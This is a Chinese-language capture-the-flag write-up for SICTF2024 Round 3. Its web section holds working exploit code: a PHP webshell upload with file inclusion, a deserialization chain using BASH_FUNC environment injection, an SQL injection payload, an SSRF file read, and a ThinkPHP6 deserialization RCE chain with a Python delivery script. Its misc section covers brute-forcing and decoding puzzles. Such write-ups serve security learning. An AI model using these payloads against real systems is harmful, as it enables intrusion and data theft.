SICTF2024_Round#3

WEB

100%_upload

知识点:文件上传+文件包含

首先上传一个正常图片,抓包,在图片结尾写入一句话木马,记得用php短标签,因为正常<?php被过滤了

image-20240216092458112

看到上传成功,用文件包含进行访问

image-20240216092534352

SICTF{92b96c29-5377-41da-b4c9-0334769ee6ea}

Not just unserialize

知识点:php反序列化和putenv函数漏洞

putenv函数漏洞可以参考https://pankas.top/2023/03/06/3%E6%9C%88%E5%88%9D%E6%AF%94%E8%B5%9B%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/#Babyweb

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<?php

highlight_file(__FILE__);
class start
{
    public $welcome;//SE
    public $you;
    public function __destruct()
    {
        $this->begin0fweb();
    }
    public  function begin0fweb()
    {
        $p='hacker!';
        $this->welcome->you = $p;
    }
}

class SE{
    public $year;//CR
    public function __set($name, $value){
        echo '  Welcome to new year!  ';
        echo($this->year);
    }
}

class CR {
    public $last;//ET
    public $newyear;//\nworries

    public function __tostring() {

        if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i',$this->newyear))
        {
            echo "empty it!";
            return 0;
        }

        if(preg_match('/^.*(worries).*$/',$this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year  ';
            empty($this->last->worries);
        }
        return false;
    }
}

class ET{

    public function __isset($name)
    {
        foreach ($_GET['get'] as $inject => $rce){
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }
}
$et=new ET();
$cr=new CR();
$se=new SE();
$Start=new start();
$cr->last=$et;
$cr->newyear="\nworries";
$se->year=$cr;
$Start->welcome=$se;
$Start->you='qetx';
echo base64_encode(serialize($Start));
?>
1
?get[BASH_FUNC_echo%%]=()%20{%20cat%20/f*;%20}

image-20240216162849766

SICTF{5acfa15e-e9a8-4106-aa38-4ed79dce9354}

EZ_SSRF

出题人骗人说flag在/flag下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
highlight_file(__file__);
error_reporting(0);
function get($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($curl);
    curl_close($curl);
    echo base64_encode($data);
    return $data;
}
class client{
    public $url;
    public $payload;
    public function __construct()
    {
        $url = "http://127.0.0.1/";
        $payload = "system(\"cat /flag\");";
        echo "Exploit";
    }
    public function __destruct()
    {
        get($this->url);
    }
}
$Client=new client();
$Client->url="file:///var/www/html/flag.php";
$exp=serialize($Client);
unserialize($exp);
echo $exp;
?>

1
O:6:"client":2:{s:3:"url";s:29:"file:///var/www/html/flag.php";s:7:"payload";N;}

image-20240219152039294

拿去进行base64解密

image-20240219152108044

hacker

sql注入,过滤了空格和一些关键字

题目告诉了表,用无列名注入,参考笔记https://blog.csdn.net/weixin_46330722/article/details/109605941

payload

1
flag'/**/union/**/select/**/group_concat(`2`)/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)n%23

image-20240219154129391

Oyst3rPHP

先用/www.zip路由下载源码,因为网站有“RT,一个很简单的Web”的前端显示,所以为了找到源码,在phpstorm中shift+ctrl+f在整个项目中搜索“RT,一个很简单的Web“出现位置,得到了如下的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
ublic function index()
    {
		echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
        echo "<img src='../Oyster.png'"."/>";
		
        
		$payload = base64_decode(@$_POST['payload']);
        $right = @$_GET['left'];
        $left = @$_GET['right'];
        
		$key = (string)@$_POST['key'];
        if($right !== $left && md5($right) == md5($left)){
            
			echo "Congratulations on getting your first oyster";
			echo "<img src='../Oyster1.png'"."/>";
            
			if(preg_match('/.+?THINKPHP/is', $key)){
                die("Oysters don't want you to eat");
            }
            if(stripos($key, '603THINKPHP') === false){
                die("!!!Oysters don't want you to eat!!!");
            }
			
			echo "WOW!!!Congratulations on getting your second oyster";
			echo "<img src='../Oyster2.png'"."/>";
            
			@unserialize($payload);
			//最后一个生蚝在根目录,而且里面有Flag???咋样去找到它呢???它的名字是什么???
			//在源码的某处注释给出了提示,这就看你是不是真懂Oyst3rphp框架咯!!!
			//小Tips:细狗函数┗|`O′|┛ 嗷~~
        }
    }

可以知道先要进行MD5绕过,然后是preg_match最大回溯绕过,最后是thinkphp的反序列化漏洞,查看源码中的readme文件,发现thinkphp是6版本,就上网查thinkphp6反序列化漏洞,得到poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
namespace think\model\concern;

trait Attribute{
    private $data=['jiang'=>['jiang'=>'cat /Oyst3333333r.php']];
    private $withAttr=['jiang'=>['jiang'=>'system']];
    protected $json=["jiang"];
    protected $jsonAssoc = true;
}
trait ModelEvent{
    protected $withEvent;
}

namespace think;

abstract class Model{
    use model\concern\Attribute;
    use model\concern\ModelEvent;
    private $exists;
    private $force;
    private $lazySave;
    protected $suffix;


    function __construct($a = '')
    {
        $this->exists = true;
        $this->force = true;
        $this->lazySave = true;
        $this->withEvent = false;
        $this->suffix = $a;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model{}

echo base64_encode(serialize(new Pivot(new Pivot())));
?>

最后用python直接打

1
2
3
4
5
import requests
url="http://yuanshen.life:39920?left=QNKCDZO&right=s878926199a"
pay={"key":1000100*"a"+"603THINKPHP","payload":"TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjk6e3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjk6IgAqAHN1ZmZpeCI7TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjk6e3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjk6IgAqAHN1ZmZpeCI7czowOiIiO3M6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NToiamlhbmciO2E6MTp7czo1OiJqaWFuZyI7czoyMToiY2F0IC9PeXN0MzMzMzMzM3IucGhwIjt9fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjU6ImppYW5nIjthOjE6e3M6NToiamlhbmciO3M6Njoic3lzdGVtIjt9fXM6NzoiACoAanNvbiI7YToxOntpOjA7czo1OiJqaWFuZyI7fXM6MTI6IgAqAGpzb25Bc3NvYyI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO31zOjE3OiIAdGhpbmtcTW9kZWwAZGF0YSI7YToxOntzOjU6ImppYW5nIjthOjE6e3M6NToiamlhbmciO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fX1zOjIxOiIAdGhpbmtcTW9kZWwAd2l0aEF0dHIiO2E6MTp7czo1OiJqaWFuZyI7YToxOntzOjU6ImppYW5nIjtzOjY6InN5c3RlbSI7fX1zOjc6IgAqAGpzb24iO2E6MTp7aTowO3M6NToiamlhbmciO31zOjEyOiIAKgBqc29uQXNzb2MiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDt9"}
res=requests.post(url,data=pay)
print(res.text)

image-20240220181209029

MISC

真💨签到

给了一个加密的zip文件,用010打开发现最后的16进制字符,先去16进制解码

image-20240219154336587

image-20240219154356825

后面提示给了文本解密

再去进行文本解密

image-20240219154449307

得到密码去解密文件,得到一个wav文件和一个steg.jpg,对wav文件进行频谱分析,得到

image-20240219154614689

再根据wav文件名“LagrangeisCapatlized”猜测lagrange要大写,然后用steghide去解密steg.jpg

image-20240219155424700

GeekChallege

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import string
import time
from pwn import *

#context.log_level="debug"

p = remote("yuanshen.life",39600)
dic=string.printable
p.recvuntil('>')#等到检测到‘>’再进行接下来的输入
pwd = ""
pwdlen = 113
lst=""
for i in range(114):
    print(i,pwd)
    for j in dic:
        payload = pwd + j + '0'*(pwdlen-len(pwd))
        p.sendline(payload)
        a = p.recvuntil('\n').decode()
        if '1'*(len(pwd)+1) in a:
            print(a)
            if j not in lst:
                lst += j
                dic = j + dic
            pwd += j
            break

p.interactive()#将终端控制权交给用户

神秘的流量

img

用脚本解密

img

得到raw key

拿key去解密流量包,但是cs-parse-http-traffic.py脚本要稍微改一下

img

然后去解密

img

img

who?who?who?

根据提示压缩包密码为6位小写字母,去爆破

image-20240223172458801

得到一个txt文件,看起来很像零宽隐写

image-20240223173024545

去在线网站解密https://yuanfux.github.io/zero-width-web/

image-20240223173039947

得到

1
2
3
U2FsdGVkX19uvldJ6CGUNff3B28QEdIjZqgUh98K+/0J16ELU8WVQydohw4P5+2M
jbhTLQHNOpcoOd7kSRgy8pwpovCmimdD8M0IbYUeXjNKYePL/WP4PCMaOJHAW3HR
b7IEoDDH1NYh3o5NwMmcFEqy1ujf72VgQIQkaeYFFFE=

猜测可能是Rabbit,去在线网站解密https://www.sojson.com/encrypt_rabbit.html

密码给了提示:树木是渣男,所以是shumu

image-20240223173243052

得到的明文像dna加密,去解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import sys

mapping = {
    'AAA': 'a', 'AAC': 'b', 'AAG': 'c', 'AAT': 'd', 'ACA': 'e', 'ACC': 'f', 'ACG': 'g', 'ACT': 'h', 'AGA': 'i',
    'AGC': 'j', 'AGG': 'k', 'AGT': 'l', 'ATA': 'm', 'ATC': 'n', 'ATG': 'o', 'ATT': 'p', 'CAA': 'q', 'CAC': 'r',
    'CAG': 's', 'CAT': 't', 'CCA': 'u', 'CCC': 'v', 'CCG': 'w', 'CCT': 'x', 'CGA': 'y', 'CGC': 'z', 'CGG': 'A',
    'CGT': 'B', 'CTA': 'C', 'CTC': 'D', 'CTG': 'E', 'CTT': 'F', 'GAA': 'G', 'GAC': 'H', 'GAG': 'I', 'GAT': 'J',
    'GCA': 'K', 'GCC': 'L', 'GCG': 'M', 'GCT': 'N', 'GGA': 'O', 'GGC': 'P', 'GGG': 'Q', 'GGT': 'R', 'GTA': 'S',
    'GTC': 'T', 'GTG': 'U', 'GTT': 'V', 'TAA': 'W', 'TAC': 'X', 'TAG': 'Y', 'TAT': 'Z', 'TCA': '1', 'TCC': '2',
    'TCG': '3', 'TCT': '4', 'TGA': '5', 'TGC': '6', 'TGG': '7', 'TGT': '8', 'TTA': '9', 'TTC': '0', 'TTG': ' ',
    'TTT': '.'}


def decode_dna(string):
    final = ""
    i = 0
    while i < len(string):
        if string[i] not in "ATCG":
            final += string[i]
            i+=1
        else :
            final += mapping[string[i:i + 3]]
            i+=3
    return final


input_string = "GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}"
print(decode_dna(input_string))

#SICTF{Q1A0_Q1A0_GA0_SU_N1_SHUMU_SH1_ZHA_NAN}

image-20240223175938921

#WP
SICTF2024_Round#3
http://www.qetx.top/posts/43181/
作者
Qetx.Jul.27
发布于
2024年2月16日
许可协议